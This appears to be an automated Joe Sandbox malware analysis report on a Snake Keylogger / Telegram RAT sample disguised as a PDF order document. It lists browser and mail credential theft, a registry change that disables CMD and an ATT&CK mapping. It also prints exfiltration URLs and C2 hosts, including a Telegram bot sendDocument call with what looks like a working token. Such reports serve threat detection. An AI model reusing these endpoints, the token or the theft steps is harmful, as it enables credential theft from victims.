Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe

0_2_00403325

Lowering of HIPS / PFW / Operating System Security Settings

Disables CMD prompt

Source: C:\Windows\SysWOW64\msiexec.exe

Registry value created: DisableCMD 1

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 8044, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 8044, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 8044, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	2 Obfuscated Files or Information	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 Software Packing	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Order requirements CIF Greece_pdf.exe	58%	ReversingLabs	Win32.Spyware.Snakekeylogger
Order requirements CIF Greece_pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://crl.micros6	0%	Avira URL Cloud	safe
http://crl.microl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.78	true	false	high
drive.usercontent.google.com	172.217.16.129	true	false	high
reallyfreegeoip.org	188.114.96.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://reallyfreegeoip.org/xml/8.46.123.75	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	msiexec.exe, 00000006.00000002.2957521886.00000000212E6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000001.00000002.2042349403.00000000078DF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897	msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	msiexec.exe, 00000006.00000002.2957521886.00000000212F0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros6	powershell.exe, 00000001.00000002.2042349403.000000000794B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	msiexec.exe, 00000006.00000002.2959617752.0000000022382000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000223D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000224A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221DE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Order requirements CIF Greece_pdf.exe	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20a	msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	msiexec.exe, 00000006.00000002.2959617752.0000000022382000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022253000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000223D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000224A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000006.00000002.2957521886.00000000212C4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2037160905.0000000005256000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	Order requirements CIF Greece_pdf.exe	false		high
http://crl.microl	powershell.exe, 00000001.00000002.2042349403.0000000007890000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?L	msiexec.exe, 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2037160905.0000000005101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000006.00000002.2943801242.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.75$	msiexec.exe, 00000006.00000002.2957521886.000000002117A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	msiexec.exe, 00000006.00000002.2959617752.00000000221B9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022480000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022388000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002235D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2040489706.000000000616D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000006.00000002.2957521886.00000000212BF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 00000006.00000002.2957521886.0000000021150000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211E7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.00000000211C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000006.00000003.2118377960.0000000000C8A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	msiexec.exe, 00000006.00000002.2959617752.00000000221B9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022480000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002222E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.0000000022388000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.000000002235D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2959617752.00000000221E4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	msiexec.exe, 00000006.00000002.2957521886.0000000021299000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2037160905.0000000005101000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/1	msiexec.exe, 00000006.00000002.2943801242.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2172281229.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/s	msiexec.exe, 00000006.00000002.2943801242.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2172281229.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000006.00000002.2957521886.0000000021150000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.78	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.217.16.129	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560036
Start date and time:	2024-11-21 10:35:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Order requirements CIF Greece_pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/13@5/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 152 Number of non-executed functions: 96
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7512 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Order requirements CIF Greece_pdf.exe

Simulations

Behavior and APIs

Time	Type	Description
04:36:04	API Interceptor	44x Sleep call for process: powershell.exe modified
04:36:58	API Interceptor	46086x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse
	new order #738833.exe	Get hash	malicious	GuLoader	Browse
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
188.114.96.3	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/7pdXjNKP/download
132.226.247.73	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
	REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.67.152
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
checkip.dyndns.com	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	132.226.8.169
	REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exe	Get hash	malicious	GuLoader	Browse	132.226.247.73
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	132.226.247.73
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	193.122.6.168
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	132.226.247.73
api.telegram.org	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse	149.154.167.220
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
